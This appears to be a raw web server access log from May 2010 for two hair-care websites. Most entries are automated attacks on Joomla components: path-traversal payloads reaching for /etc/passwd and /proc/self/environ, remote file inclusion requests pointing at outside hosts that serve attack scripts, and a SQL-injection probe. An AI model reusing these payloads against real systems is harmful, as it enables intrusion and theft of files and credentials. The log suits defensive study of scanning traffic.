174.133.201.194 - - [31/May/2010:08:17:47 -0700] "GET /logs/access_091102.log//index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
174.133.201.194 - - [31/May/2010:08:17:47 -0700] "GET /index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
174.133.201.194 - - [31/May/2010:08:17:47 -0700] "GET /logs//index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
210.109.108.186 - - [31/May/2010:08:18:17 -0700] "GET /logs/access.log/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
210.109.108.186 - - [31/May/2010:08:18:18 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
210.109.108.186 - - [31/May/2010:08:18:19 -0700] "GET /logs/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
89.110.147.156 - - [31/May/2010:08:18:36 -0700] "GET /logs/access_100315.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
89.110.147.156 - - [31/May/2010:08:18:36 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
89.110.147.156 - - [31/May/2010:08:18:36 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
208.115.111.245 - - [31/May/2010:08:18:55 -0700] "GET /freehairsecretsphp/viewtopic.php?p=11269 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [31/May/2010:08:18:59 -0700] "GET /freehairsecretsphp/viewtopic.php?p=3173 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [31/May/2010:08:19:03 -0700] "GET /logs/?D=D HTTP/1.1" 200 5657 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [31/May/2010:08:19:08 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12874 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [31/May/2010:08:19:13 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15183 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [31/May/2010:08:19:18 -0700] "GET /freehairsecretsphp/viewtopic.php?p=16419 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [31/May/2010:08:19:23 -0700] "GET /freehairsecretsphp/viewtopic.php?p=16923 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [31/May/2010:08:19:28 -0700] "GET /logs/?D=D HTTP/1.1" 200 5657 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [31/May/2010:08:19:33 -0700] "GET /logs/?M=D HTTP/1.1" 200 5657 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [31/May/2010:08:19:38 -0700] "GET /logs/?S=D HTTP/1.1" 200 5657 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
210.109.108.186 - - [31/May/2010:08:21:05 -0700] "GET /logs/access_100412.log/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
210.109.108.186 - - [31/May/2010:08:21:06 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
210.109.108.186 - - [31/May/2010:08:21:07 -0700] "GET /logs/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
210.109.108.186 - - [31/May/2010:08:21:29 -0700] "GET /logs/access_100510.log/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
85.94.199.36 - - [31/May/2010:08:21:50 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.freehairsecrets.com"
85.94.199.36 - - [31/May/2010:08:21:50 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck" "www.freehairsecrets.com"
85.94.199.36 - - [31/May/2010:08:21:50 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.freehairsecrets.com"
85.94.199.36 - - [31/May/2010:08:22:44 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck" "growlonghairfast.com"
85.94.199.36 - - [31/May/2010:08:22:44 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1" "growlonghairfast.com"
85.94.199.36 - - [31/May/2010:08:22:44 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck" "growlonghairfast.com"
70.38.11.213 - - [31/May/2010:08:23:13 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck" "growlonghairfast.com"
70.38.11.213 - - [31/May/2010:08:23:14 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/" "growlonghairfast.com"
70.38.11.213 - - [31/May/2010:08:23:14 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "growlonghairfast.com"
85.94.199.36 - - [31/May/2010:08:24:18 -0700] "GET /logs/access_100503.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "growlonghairfast.com"
85.94.199.36 - - [31/May/2010:08:24:19 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck" "growlonghairfast.com"
85.94.199.36 - - [31/May/2010:08:24:19 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck" "growlonghairfast.com"
187.45.193.159 - - [31/May/2010:08:24:33 -0700] "GET /logs/access_100510.log//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.159 - - [31/May/2010:08:24:34 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.159 - - [31/May/2010:08:24:35 -0700] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
72.32.2.216 - - [31/May/2010:08:24:47 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/" "growlonghairfast.com"
72.32.2.216 - - [31/May/2010:08:24:47 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "growlonghairfast.com"
72.32.2.216 - - [31/May/2010:08:24:47 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/" "growlonghairfast.com"
70.38.11.213 - - [31/May/2010:08:24:48 -0700] "GET /logs/access_100503.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck" "growlonghairfast.com"
70.38.11.213 - - [31/May/2010:08:24:48 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "growlonghairfast.com"
70.38.11.213 - - [31/May/2010:08:24:48 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1" "growlonghairfast.com"
187.45.193.159 - - [31/May/2010:08:25:00 -0700] "GET /logs/access.log//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
187.45.193.159 - - [31/May/2010:08:25:01 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
187.45.193.159 - - [31/May/2010:08:25:02 -0700] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
187.45.193.159 - - [31/May/2010:08:25:39 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.159 - - [31/May/2010:08:25:41 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
93.89.215.70 - - [31/May/2010:08:25:47 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck" "growlonghairfast.com"
93.89.215.70 - - [31/May/2010:08:25:47 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck" "growlonghairfast.com"
93.89.215.70 - - [31/May/2010:08:25:47 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "growlonghairfast.com"
173.203.115.77 - - [31/May/2010:08:25:48 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "growlonghairfast.com"
173.203.115.77 - - [31/May/2010:08:25:48 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "growlonghairfast.com"
173.203.115.77 - - [31/May/2010:08:25:48 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "growlonghairfast.com"
72.32.2.216 - - [31/May/2010:08:26:02 -0700] "GET /logs/access_100503.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1" "growlonghairfast.com"
72.32.2.216 - - [31/May/2010:08:26:02 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "growlonghairfast.com"
72.32.2.216 - - [31/May/2010:08:26:02 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "growlonghairfast.com"
187.45.193.159 - - [31/May/2010:08:26:29 -0700] "GET /logs/access_100412.log//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
85.94.199.36 - - [31/May/2010:08:28:11 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck" "www.freehairsecrets.com"
85.94.199.36 - - [31/May/2010:08:28:11 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.freehairsecrets.com"
85.94.199.36 - - [31/May/2010:08:28:12 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.freehairsecrets.com"
70.38.11.213 - - [31/May/2010:08:28:45 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/" "www.freehairsecrets.com"
70.38.11.213 - - [31/May/2010:08:28:45 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck" "www.freehairsecrets.com"
70.38.11.213 - - [31/May/2010:08:28:45 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)" "www.freehairsecrets.com"
173.203.115.77 - - [31/May/2010:08:29:51 -0700] "GET /logs/access_100503.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "growlonghairfast.com"
173.203.115.77 - - [31/May/2010:08:29:51 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "growlonghairfast.com"
173.203.115.77 - - [31/May/2010:08:29:51 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "growlonghairfast.com"
93.89.215.70 - - [31/May/2010:08:29:56 -0700] "GET /logs/access_100503.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1" "growlonghairfast.com"
93.89.215.70 - - [31/May/2010:08:29:56 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck" "growlonghairfast.com"
93.89.215.70 - - [31/May/2010:08:29:56 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "growlonghairfast.com"
72.32.2.216 - - [31/May/2010:08:30:23 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.freehairsecrets.com"
72.32.2.216 - - [31/May/2010:08:30:23 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.freehairsecrets.com"
72.32.2.216 - - [31/May/2010:08:30:23 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/" "www.freehairsecrets.com"
122.112.32.51 - - [31/May/2010:08:30:54 -0700] "GET /logs/access_100405.log%20%20//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
122.112.32.51 - - [31/May/2010:08:30:54 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
122.112.32.51 - - [31/May/2010:08:30:54 -0700] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.89.215.70 - - [31/May/2010:08:34:33 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1" "www.freehairsecrets.com"
93.89.215.70 - - [31/May/2010:08:34:34 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck" "www.freehairsecrets.com"
93.89.215.70 - - [31/May/2010:08:34:34 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2" "www.freehairsecrets.com"
173.203.115.77 - - [31/May/2010:08:34:57 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.freehairsecrets.com"
173.203.115.77 - - [31/May/2010:08:34:57 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.freehairsecrets.com"
173.203.115.77 - - [31/May/2010:08:34:57 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.freehairsecrets.com"
189.108.172.26 - - [31/May/2010:08:37:57 -0700] "GET /logs/access_091102.log/index.php?option=com_quran&action=viewayat&surano=' HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
189.108.172.26 - - [31/May/2010:08:37:58 -0700] "GET /index.php?option=com_quran&action=viewayat&surano=' HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
189.108.172.26 - - [31/May/2010:08:38:03 -0700] "GET /logs/index.php?option=com_quran&action=viewayat&surano=' HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
192.167.114.31 - - [31/May/2010:08:40:21 -0700] "GET /logs/access_100510.log//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
192.167.114.31 - - [31/May/2010:08:40:21 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
192.167.114.31 - - [31/May/2010:08:40:22 -0700] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
192.167.114.31 - - [31/May/2010:08:40:55 -0700] "GET /logs/access.log//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
192.167.114.31 - - [31/May/2010:08:40:55 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
192.167.114.31 - - [31/May/2010:08:40:56 -0700] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
